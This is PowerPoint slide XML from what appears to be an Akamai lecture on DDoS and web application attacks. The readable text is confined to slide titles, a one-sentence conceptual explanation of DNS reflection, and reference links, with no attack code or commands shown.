          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="322" name="Group 321"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5877650" y="2103120"/>
            <a:ext cx="5635624" cy="4069080"/>
            <a:chOff x="5877650" y="2103120"/>
            <a:chExt cx="5635624" cy="4069080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35937" name="Picture 9" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5980116" y="5382295"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35938" name="Picture 5" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8629286" y="5333192"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35939" name="Picture 11" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8541763" y="2103120"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35940" name="Picture 13" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5877650" y="2229078"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35945" name="Picture 6" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10591081" y="3332810"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35927" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2169514" y="3031872"/>
            <a:ext cx="1864752" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Origin Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Picture 10" descr="gray_server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3023710" y="3352842"/>
            <a:ext cx="1950720" cy="1247774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Title 587"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="727075" y="319090"/>
            <a:ext cx="11535805" cy="805816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="54842" tIns="27420" rIns="54842" bIns="27420" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="548494" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Prolexic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Anycast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Scrubbing Centers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4034266" y="5887419"/>
            <a:ext cx="1939304" cy="777702"/>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25" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4312908" y="2615072"/>
            <a:ext cx="4285170" cy="1412746"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11052177" y="301898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3" name="TextBox 492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8208526" y="4740654"/>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4" name="TextBox 493"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7683153" y="303317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5" name="TextBox 494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783286" y="4840416"/>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6" name="TextBox 495"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5503542" y="1768522"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1731422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down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="524"/>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2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59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25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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2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22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="273"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="58"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4" grpId="1" animBg="1"/>
      <p:bldP spid="525" grpId="0" animBg="1"/>
      <p:bldP spid="5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Nineteen Attacks Exceeded 100 Gbps in Q1 2016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507" t="7901" r="9861" b="48342"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="1464493"/>
            <a:ext cx="7446394" cy="53644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07" t="51377" r="9861" b="12959"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670203" y="3213100"/>
            <a:ext cx="6729693" cy="4365383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="12344400" y="3543300"/>
            <a:ext cx="647700" cy="9906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569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294"/>
            <a:ext cx="10424160" cy="548640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10226041" y="2188283"/>
            <a:ext cx="3516430" cy="2462213"/>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rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS reflection attack:  The bulk of the traffic  was created by sending DNS requests with spoofed source addresses to open resolvers for domains that had enabled DNSSEC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"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003" t="11395" r="25286" b="24999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207409" y="400833"/>
            <a:ext cx="6528034" cy="6964868"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718372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A8CCFDC8-7390-4064-9BFC-2AEE16C0501A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24131" t="15924" r="25522" b="12048"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939800" y="574674"/>
            <a:ext cx="9207500" cy="7080251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294206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Amplification Rates of Various Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="13167360" cy="4827270"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://blog.sucuri.net/wp-content/uploads/2014/09/udp-ampl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504950"/>
            <a:ext cx="12774627"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175" y="6430774"/>
            <a:ext cx="11820865" cy="892552"/>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https://www.us-cert.gov/ncas/alerts/TA14-017A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://blog.sucuri.net/2014/09/quick-analysis-of-a-ddos-attack-using-ssdp.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1112644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Attack Frequency by Industry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3937B323-C765-4D70-A3E3-CFBE829D6741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24479" t="40795" r="25915" b="24160"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="825759" y="1854200"/>
            <a:ext cx="11739177" cy="4457700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175452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 09 Sep 09 Pres-EVP 1-on-1">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="777777"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="777777"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="003366"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="093678"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF8E11"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="656565"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AAAEBE"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="E7800E"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2B85BB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="0936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square" rtlCol="0" anchor="ctr" anchorCtr="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr dirty="0" err="1" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>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292929"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="003366"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="093678"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FF8E11"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="212121"/>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FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="5F5F5F"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="003366"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="093678"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FF8E11"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="505050"/>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09 Sep 09 Pres-EVP 1-on-1</Template>
  <TotalTime>35456</TotalTime>
  <Words>1504</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>180</Paragraphs>
  <Slides>31</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MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>2010 09 Sep 09 Pres-EVP 1-on-1</vt:lpstr>
      <vt:lpstr>DDOS Attacks and Application-Layer Attacks</vt:lpstr>
      <vt:lpstr>Distributed Denial of Service (DDOS) Attacks</vt:lpstr>
      <vt:lpstr>Largest DDOS Attacks by Year</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nineteen Attacks Exceeded 100 Gbps in Q1 2016</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Amplification Rates of Various Attacks</vt:lpstr>
      <vt:lpstr>DDoS Attack Frequency by Industry</vt:lpstr>
      <vt:lpstr>Krebs Blog KrebsOnSecurity.com Comes Under Attack</vt:lpstr>
      <vt:lpstr>Default Passwords Hardcoded into Mirai BotNet Source</vt:lpstr>
      <vt:lpstr>memcached reflection attack on GitHub February 28, 2018</vt:lpstr>
      <vt:lpstr>Web Application Attacks</vt:lpstr>
      <vt:lpstr>Defeating HTTP flooding attacks – Rate Controls</vt:lpstr>
      <vt:lpstr>Top Web Application Attack Vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Examples of Attacks “Scrubbed” by Akamai</vt:lpstr>
      <vt:lpstr>Structured Query Language (SQL)</vt:lpstr>
      <vt:lpstr>Example SQL Injection</vt:lpstr>
      <vt:lpstr>bobby-tables.com: A guide to preventing SQL injection</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS: Basic Cookie Stealing </vt:lpstr>
      <vt:lpstr>File Inclusion Attack</vt:lpstr>
      <vt:lpstr>File Inclusion Attack</vt:lpstr>
      <vt:lpstr>Cache Busting</vt:lpstr>
      <vt:lpstr>Malicious login attempts</vt:lpstr>
      <vt:lpstr>Bot-Based Account Takeover: Obtain Password Dump</vt:lpstr>
      <vt:lpstr>Leverage Compromised Home Cable Modems/Routers</vt:lpstr>
      <vt:lpstr>Account Takeover Campaign Attack Architecture</vt:lpstr>
      <vt:lpstr>Attacking IP Persistence: Finance Customer</vt:lpstr>
      <vt:lpstr>Observations</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Akamai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Summers, John</dc:creator>
  <cp:lastModifiedBy>Bruce Maggs</cp:lastModifiedBy>
  <cp:revision>408</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-09-07T16:08:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-13T01:01:58Z</dcterms:modified>
</cp:coreProperties>
</file>